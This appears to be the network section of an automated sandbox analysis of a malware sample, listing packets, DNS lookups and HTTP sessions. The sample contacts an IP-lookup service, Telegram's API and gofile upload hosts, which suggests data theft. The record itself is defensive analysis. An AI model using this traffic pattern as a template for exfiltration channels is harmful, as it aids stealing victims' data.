Nov 29, 2024 12:28:06.257941961 CET	49708	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.258191109 CET	49706	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.258366108 CET	49709	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.276462078 CET	443	49704	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.276556015 CET	49704	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.277556896 CET	443	49705	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.277635098 CET	49705	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.279238939 CET	49704	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.279247046 CET	443	49704	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.279541016 CET	443	49704	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.280776978 CET	49704	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.282223940 CET	49705	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.282231092 CET	443	49705	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.282519102 CET	443	49705	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.283514023 CET	49705	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.299329996 CET	443	49709	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.299335003 CET	443	49708	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.303329945 CET	443	49707	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.303330898 CET	443	49706	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.327333927 CET	443	49704	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.327339888 CET	443	49705	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.617142916 CET	443	49708	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.617207050 CET	443	49708	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.617243052 CET	443	49708	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.617297888 CET	49708	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.617305040 CET	443	49708	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.617355108 CET	49708	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.624111891 CET	443	49709	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.624247074 CET	443	49709	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.624334097 CET	49709	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.629955053 CET	49708	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.630186081 CET	49709	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.678318977 CET	443	49706	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.678421021 CET	443	49706	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.678863049 CET	49706	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.679321051 CET	49706	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.728039026 CET	443	49704	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.728135109 CET	443	49704	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.728404999 CET	49704	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.728641033 CET	49704	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.728713989 CET	443	49705	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.728781939 CET	443	49705	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.728817940 CET	443	49705	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.728878975 CET	443	49705	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.728878021 CET	49705	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.728923082 CET	49705	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.729984999 CET	49705	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.801824093 CET	443	49707	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.801924944 CET	443	49707	185.199.108.133	192.168.2.5
Nov 29, 2024 12:28:06.802020073 CET	49707	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:06.802661896 CET	49707	443	192.168.2.5	185.199.108.133
Nov 29, 2024 12:28:07.438435078 CET	49710	443	192.168.2.5	149.154.167.220
Nov 29, 2024 12:28:07.438533068 CET	443	49710	149.154.167.220	192.168.2.5
Nov 29, 2024 12:28:07.438632011 CET	49710	443	192.168.2.5	149.154.167.220
Nov 29, 2024 12:28:07.439034939 CET	49710	443	192.168.2.5	149.154.167.220
Nov 29, 2024 12:28:07.439049959 CET	443	49710	149.154.167.220	192.168.2.5
Nov 29, 2024 12:28:08.853102922 CET	443	49710	149.154.167.220	192.168.2.5
Nov 29, 2024 12:28:08.853214979 CET	49710	443	192.168.2.5	149.154.167.220
Nov 29, 2024 12:28:08.855509043 CET	49710	443	192.168.2.5	149.154.167.220
Nov 29, 2024 12:28:08.855520964 CET	443	49710	149.154.167.220	192.168.2.5
Nov 29, 2024 12:28:08.855777025 CET	443	49710	149.154.167.220	192.168.2.5
Nov 29, 2024 12:28:08.856808901 CET	49710	443	192.168.2.5	149.154.167.220
Nov 29, 2024 12:28:08.903358936 CET	443	49710	149.154.167.220	192.168.2.5
Nov 29, 2024 12:28:09.374880075 CET	443	49710	149.154.167.220	192.168.2.5
Nov 29, 2024 12:28:09.374948978 CET	443	49710	149.154.167.220	192.168.2.5
Nov 29, 2024 12:28:09.375032902 CET	49710	443	192.168.2.5	149.154.167.220
Nov 29, 2024 12:28:09.377974033 CET	49710	443	192.168.2.5	149.154.167.220
Nov 29, 2024 12:28:10.116451979 CET	49711	80	192.168.2.5	104.16.184.241
Nov 29, 2024 12:28:10.236890078 CET	80	49711	104.16.184.241	192.168.2.5
Nov 29, 2024 12:28:10.237150908 CET	49711	80	192.168.2.5	104.16.184.241
Nov 29, 2024 12:28:10.237335920 CET	49711	80	192.168.2.5	104.16.184.241
Nov 29, 2024 12:28:10.357237101 CET	80	49711	104.16.184.241	192.168.2.5
Nov 29, 2024 12:28:11.373636007 CET	80	49711	104.16.184.241	192.168.2.5
Nov 29, 2024 12:28:11.390856981 CET	49711	80	192.168.2.5	104.16.184.241
Nov 29, 2024 12:28:11.511368036 CET	80	49711	104.16.184.241	192.168.2.5
Nov 29, 2024 12:28:11.511454105 CET	49711	80	192.168.2.5	104.16.184.241
Nov 29, 2024 12:28:13.292798996 CET	49712	80	192.168.2.5	104.16.184.241
Nov 29, 2024 12:28:13.412734032 CET	80	49712	104.16.184.241	192.168.2.5
Nov 29, 2024 12:28:13.412868023 CET	49712	80	192.168.2.5	104.16.184.241
Nov 29, 2024 12:28:13.413187981 CET	49712	80	192.168.2.5	104.16.184.241
Nov 29, 2024 12:28:13.533163071 CET	80	49712	104.16.184.241	192.168.2.5
Nov 29, 2024 12:28:13.765032053 CET	49713	443	192.168.2.5	45.112.123.126
Nov 29, 2024 12:28:13.765064955 CET	443	49713	45.112.123.126	192.168.2.5
Nov 29, 2024 12:28:13.765388012 CET	49713	443	192.168.2.5	45.112.123.126
Nov 29, 2024 12:28:13.765986919 CET	49713	443	192.168.2.5	45.112.123.126
Nov 29, 2024 12:28:13.766000986 CET	443	49713	45.112.123.126	192.168.2.5
Nov 29, 2024 12:28:14.550409079 CET	80	49712	104.16.184.241	192.168.2.5
Nov 29, 2024 12:28:14.551619053 CET	49712	80	192.168.2.5	104.16.184.241
Nov 29, 2024 12:28:14.671960115 CET	80	49712	104.16.184.241	192.168.2.5
Nov 29, 2024 12:28:14.672033072 CET	49712	80	192.168.2.5	104.16.184.241
Nov 29, 2024 12:28:15.241754055 CET	443	49713	45.112.123.126	192.168.2.5
Nov 29, 2024 12:28:15.242297888 CET	49713	443	192.168.2.5	45.112.123.126
Nov 29, 2024 12:28:15.254987001 CET	49713	443	192.168.2.5	45.112.123.126
Nov 29, 2024 12:28:15.255031109 CET	443	49713	45.112.123.126	192.168.2.5
Nov 29, 2024 12:28:15.255330086 CET	443	49713	45.112.123.126	192.168.2.5
Nov 29, 2024 12:28:15.261403084 CET	49713	443	192.168.2.5	45.112.123.126
Nov 29, 2024 12:28:15.303333044 CET	443	49713	45.112.123.126	192.168.2.5
Nov 29, 2024 12:28:15.767611027 CET	443	49713	45.112.123.126	192.168.2.5
Nov 29, 2024 12:28:15.767693043 CET	443	49713	45.112.123.126	192.168.2.5
Nov 29, 2024 12:28:15.768151999 CET	49713	443	192.168.2.5	45.112.123.126
Nov 29, 2024 12:28:15.768670082 CET	49713	443	192.168.2.5	45.112.123.126
Nov 29, 2024 12:28:16.184062958 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:16.184120893 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:16.184340000 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:16.187736034 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:16.187752962 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:17.607777119 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:17.607932091 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:17.611608982 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:17.611622095 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:17.611871004 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:17.615822077 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:17.663335085 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.037764072 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.037789106 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.049712896 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.049720049 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.062077045 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.062077045 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.062093973 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.062098980 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.062258959 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.062258959 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.062267065 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.062273979 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.062315941 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.062323093 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.075119972 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.075119972 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.075130939 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.075139046 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.083695889 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.083695889 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.083703995 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.083713055 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.083817005 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.083817005 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.083826065 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.083834887 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.083937883 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.083937883 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.083947897 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.083956957 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.084047079 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.084047079 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.084054947 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.084090948 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.087985992 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.087992907 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.088036060 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.088104963 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.088121891 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.088121891 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.088129997 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.088134050 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.088248014 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.088248014 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.088254929 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.088260889 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.088295937 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.088310957 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.092364073 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.092364073 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.092374086 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.092382908 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.092412949 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.092433929 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.092466116 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.092478991 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.092529058 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.092529058 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.092535019 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.092540979 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.092622995 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.092622995 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.092629910 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.092638969 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.100276947 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:18.100341082 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.249224901 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:18.300162077 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:19.760003090 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:19.760123968 CET	443	49714	31.14.70.244	192.168.2.5
Nov 29, 2024 12:28:19.760569096 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:19.763963938 CET	49714	443	192.168.2.5	31.14.70.244
Nov 29, 2024 12:28:20.141696930 CET	49723	80	192.168.2.5	104.16.184.241
Nov 29, 2024 12:28:20.262928963 CET	80	49723	104.16.184.241	192.168.2.5
Nov 29, 2024 12:28:20.263010025 CET	49723	80	192.168.2.5	104.16.184.241
Nov 29, 2024 12:28:20.263336897 CET	49723	80	192.168.2.5	104.16.184.241
Nov 29, 2024 12:28:20.383761883 CET	80	49723	104.16.184.241	192.168.2.5
Nov 29, 2024 12:28:21.355782032 CET	80	49723	104.16.184.241	192.168.2.5
Nov 29, 2024 12:28:21.356199026 CET	49723	80	192.168.2.5	104.16.184.241
Nov 29, 2024 12:28:21.366101980 CET	49724	443	192.168.2.5	149.154.167.220
Nov 29, 2024 12:28:21.366153955 CET	443	49724	149.154.167.220	192.168.2.5
Nov 29, 2024 12:28:21.366225958 CET	49724	443	192.168.2.5	149.154.167.220
Nov 29, 2024 12:28:21.366606951 CET	49724	443	192.168.2.5	149.154.167.220
Nov 29, 2024 12:28:21.366619110 CET	443	49724	149.154.167.220	192.168.2.5
Nov 29, 2024 12:28:21.476520061 CET	80	49723	104.16.184.241	192.168.2.5
Nov 29, 2024 12:28:21.476604939 CET	49723	80	192.168.2.5	104.16.184.241
Nov 29, 2024 12:28:22.772402048 CET	443	49724	149.154.167.220	192.168.2.5
Nov 29, 2024 12:28:22.774516106 CET	49724	443	192.168.2.5	149.154.167.220
Nov 29, 2024 12:28:22.774554968 CET	443	49724	149.154.167.220	192.168.2.5
Nov 29, 2024 12:28:23.457128048 CET	443	49724	149.154.167.220	192.168.2.5
Nov 29, 2024 12:28:23.457156897 CET	443	49724	149.154.167.220	192.168.2.5
Nov 29, 2024 12:28:23.457211018 CET	443	49724	149.154.167.220	192.168.2.5
Nov 29, 2024 12:28:23.457254887 CET	49724	443	192.168.2.5	149.154.167.220
Nov 29, 2024 12:28:23.458817959 CET	49724	443	192.168.2.5	149.154.167.220
Nov 29, 2024 12:28:23.784192085 CET	49733	443	192.168.2.5	3.210.246.148
Nov 29, 2024 12:28:23.784241915 CET	443	49733	3.210.246.148	192.168.2.5
Nov 29, 2024 12:28:23.784320116 CET	49733	443	192.168.2.5	3.210.246.148
Nov 29, 2024 12:28:23.784894943 CET	49733	443	192.168.2.5	3.210.246.148
Nov 29, 2024 12:28:23.784915924 CET	443	49733	3.210.246.148	192.168.2.5
Nov 29, 2024 12:28:25.330487967 CET	443	49733	3.210.246.148	192.168.2.5
Nov 29, 2024 12:28:25.330693007 CET	49733	443	192.168.2.5	3.210.246.148
Nov 29, 2024 12:28:25.334422112 CET	49733	443	192.168.2.5	3.210.246.148
Nov 29, 2024 12:28:25.334429026 CET	443	49733	3.210.246.148	192.168.2.5
Nov 29, 2024 12:28:25.334687948 CET	443	49733	3.210.246.148	192.168.2.5
Nov 29, 2024 12:28:25.341943979 CET	49733	443	192.168.2.5	3.210.246.148
Nov 29, 2024 12:28:25.383333921 CET	443	49733	3.210.246.148	192.168.2.5
Nov 29, 2024 12:28:25.661914110 CET	443	49733	3.210.246.148	192.168.2.5
Nov 29, 2024 12:28:25.662715912 CET	49733	443	192.168.2.5	3.210.246.148
Nov 29, 2024 12:28:25.662755013 CET	443	49733	3.210.246.148	192.168.2.5
Nov 29, 2024 12:28:26.037069082 CET	443	49733	3.210.246.148	192.168.2.5
Nov 29, 2024 12:28:26.037142038 CET	443	49733	3.210.246.148	192.168.2.5
Nov 29, 2024 12:28:26.038144112 CET	49733	443	192.168.2.5	3.210.246.148
Nov 29, 2024 12:28:26.038916111 CET	49733	443	192.168.2.5	3.210.246.148

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2024 12:28:04.766319036 CET	58162	53	192.168.2.5	1.1.1.1
Nov 29, 2024 12:28:04.909538031 CET	53	58162	1.1.1.1	192.168.2.5
Nov 29, 2024 12:28:06.922272921 CET	59159	53	192.168.2.5	1.1.1.1
Nov 29, 2024 12:28:07.062804937 CET	53	59159	1.1.1.1	192.168.2.5
Nov 29, 2024 12:28:07.295082092 CET	59636	53	192.168.2.5	1.1.1.1
Nov 29, 2024 12:28:07.437258005 CET	53	59636	1.1.1.1	192.168.2.5
Nov 29, 2024 12:28:09.957581043 CET	60725	53	192.168.2.5	1.1.1.1
Nov 29, 2024 12:28:10.101733923 CET	53	60725	1.1.1.1	192.168.2.5
Nov 29, 2024 12:28:11.395087957 CET	58929	53	192.168.2.5	1.1.1.1
Nov 29, 2024 12:28:11.538475990 CET	53	58929	1.1.1.1	192.168.2.5
Nov 29, 2024 12:28:13.617230892 CET	51448	53	192.168.2.5	1.1.1.1
Nov 29, 2024 12:28:13.764121056 CET	53	51448	1.1.1.1	192.168.2.5
Nov 29, 2024 12:28:16.032636881 CET	58552	53	192.168.2.5	1.1.1.1
Nov 29, 2024 12:28:16.181545973 CET	53	58552	1.1.1.1	192.168.2.5
Nov 29, 2024 12:28:19.982868910 CET	59091	53	192.168.2.5	1.1.1.1
Nov 29, 2024 12:28:20.126087904 CET	53	59091	1.1.1.1	192.168.2.5
Nov 29, 2024 12:28:23.472875118 CET	63843	53	192.168.2.5	1.1.1.1
Nov 29, 2024 12:28:23.783042908 CET	53	63843	1.1.1.1	192.168.2.5
Nov 29, 2024 12:28:36.848095894 CET	57626	53	192.168.2.5	1.1.1.1
Nov 29, 2024 12:28:36.988872051 CET	53	57626	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 29, 2024 12:28:04.766319036 CET	192.168.2.5	1.1.1.1	0xfbc8	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:06.922272921 CET	192.168.2.5	1.1.1.1	0xd7e4	Standard query (0)	180.182.11.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Nov 29, 2024 12:28:07.295082092 CET	192.168.2.5	1.1.1.1	0x3673	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:09.957581043 CET	192.168.2.5	1.1.1.1	0x4077	Standard query (0)	icanhazip.com	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:11.395087957 CET	192.168.2.5	1.1.1.1	0xaff9	Standard query (0)	180.182.11.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Nov 29, 2024 12:28:13.617230892 CET	192.168.2.5	1.1.1.1	0xb54e	Standard query (0)	api.gofile.io	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:16.032636881 CET	192.168.2.5	1.1.1.1	0x49cb	Standard query (0)	store5.gofile.io	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:19.982868910 CET	192.168.2.5	1.1.1.1	0xc00a	Standard query (0)	180.182.11.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Nov 29, 2024 12:28:23.472875118 CET	192.168.2.5	1.1.1.1	0x7e5f	Standard query (0)	szurubooru.zulipchat.com	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:36.848095894 CET	192.168.2.5	1.1.1.1	0x778b	Standard query (0)	szurubooru.zulipchat.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 29, 2024 12:28:04.909538031 CET	1.1.1.1	192.168.2.5	0xfbc8	No error (0)	raw.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:04.909538031 CET	1.1.1.1	192.168.2.5	0xfbc8	No error (0)	raw.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:04.909538031 CET	1.1.1.1	192.168.2.5	0xfbc8	No error (0)	raw.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:04.909538031 CET	1.1.1.1	192.168.2.5	0xfbc8	No error (0)	raw.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:07.062804937 CET	1.1.1.1	192.168.2.5	0xd7e4	Name error (3)	180.182.11.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Nov 29, 2024 12:28:07.437258005 CET	1.1.1.1	192.168.2.5	0x3673	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:10.101733923 CET	1.1.1.1	192.168.2.5	0x4077	No error (0)	icanhazip.com		104.16.184.241	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:10.101733923 CET	1.1.1.1	192.168.2.5	0x4077	No error (0)	icanhazip.com		104.16.185.241	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:11.538475990 CET	1.1.1.1	192.168.2.5	0xaff9	Name error (3)	180.182.11.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Nov 29, 2024 12:28:13.764121056 CET	1.1.1.1	192.168.2.5	0xb54e	No error (0)	api.gofile.io		45.112.123.126	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:16.181545973 CET	1.1.1.1	192.168.2.5	0x49cb	No error (0)	store5.gofile.io		31.14.70.244	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:20.126087904 CET	1.1.1.1	192.168.2.5	0xc00a	Name error (3)	180.182.11.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Nov 29, 2024 12:28:23.783042908 CET	1.1.1.1	192.168.2.5	0x7e5f	No error (0)	szurubooru.zulipchat.com		3.210.246.148	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:23.783042908 CET	1.1.1.1	192.168.2.5	0x7e5f	No error (0)	szurubooru.zulipchat.com		50.17.0.11	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:23.783042908 CET	1.1.1.1	192.168.2.5	0x7e5f	No error (0)	szurubooru.zulipchat.com		3.90.94.202	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:23.783042908 CET	1.1.1.1	192.168.2.5	0x7e5f	No error (0)	szurubooru.zulipchat.com		54.198.104.147	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:23.783042908 CET	1.1.1.1	192.168.2.5	0x7e5f	No error (0)	szurubooru.zulipchat.com		44.208.10.127	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:23.783042908 CET	1.1.1.1	192.168.2.5	0x7e5f	No error (0)	szurubooru.zulipchat.com		52.20.41.38	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:36.988872051 CET	1.1.1.1	192.168.2.5	0x778b	No error (0)	szurubooru.zulipchat.com		52.20.41.38	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:36.988872051 CET	1.1.1.1	192.168.2.5	0x778b	No error (0)	szurubooru.zulipchat.com		50.17.0.11	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:36.988872051 CET	1.1.1.1	192.168.2.5	0x778b	No error (0)	szurubooru.zulipchat.com		44.208.10.127	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:36.988872051 CET	1.1.1.1	192.168.2.5	0x778b	No error (0)	szurubooru.zulipchat.com		54.198.104.147	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:36.988872051 CET	1.1.1.1	192.168.2.5	0x778b	No error (0)	szurubooru.zulipchat.com		3.90.94.202	A (IP address)	IN (0x0001)	false
Nov 29, 2024 12:28:36.988872051 CET	1.1.1.1	192.168.2.5	0x778b	No error (0)	szurubooru.zulipchat.com		3.210.246.148	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

raw.githubusercontent.com

api.telegram.org

api.gofile.io

store5.gofile.io

szurubooru.zulipchat.com

icanhazip.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49711	104.16.184.241	80	5276	C:\Users\user\Desktop\uyz4YPUyc9.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 12:28:10.237335920 CET	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Nov 29, 2024 12:28:11.373636007 CET	535	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 11:28:11 GMT Content-Type: text/plain Content-Length: 13 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=7W4xXhyYYh5VPnvmudI9fbE2tLCfNjPg0lyCwlnvXxM-1732879691-1.0.1.1-ZaHQvnkI21pc00jr8H5DbBpLGG9BEIimSr0H11xqF8AFlO9i2ljkueBHYMxEiWhAWBK4jaSUwLT5Z328grIuUg; path=/; expires=Fri, 29-Nov-24 11:58:11 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8ea240b6095fefa7-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38 0a Data Ascii: 8.46.123.228

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49712	104.16.184.241	80	5276	C:\Users\user\Desktop\uyz4YPUyc9.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 12:28:13.413187981 CET	39	OUT	GET / HTTP/1.1 Host: icanhazip.com
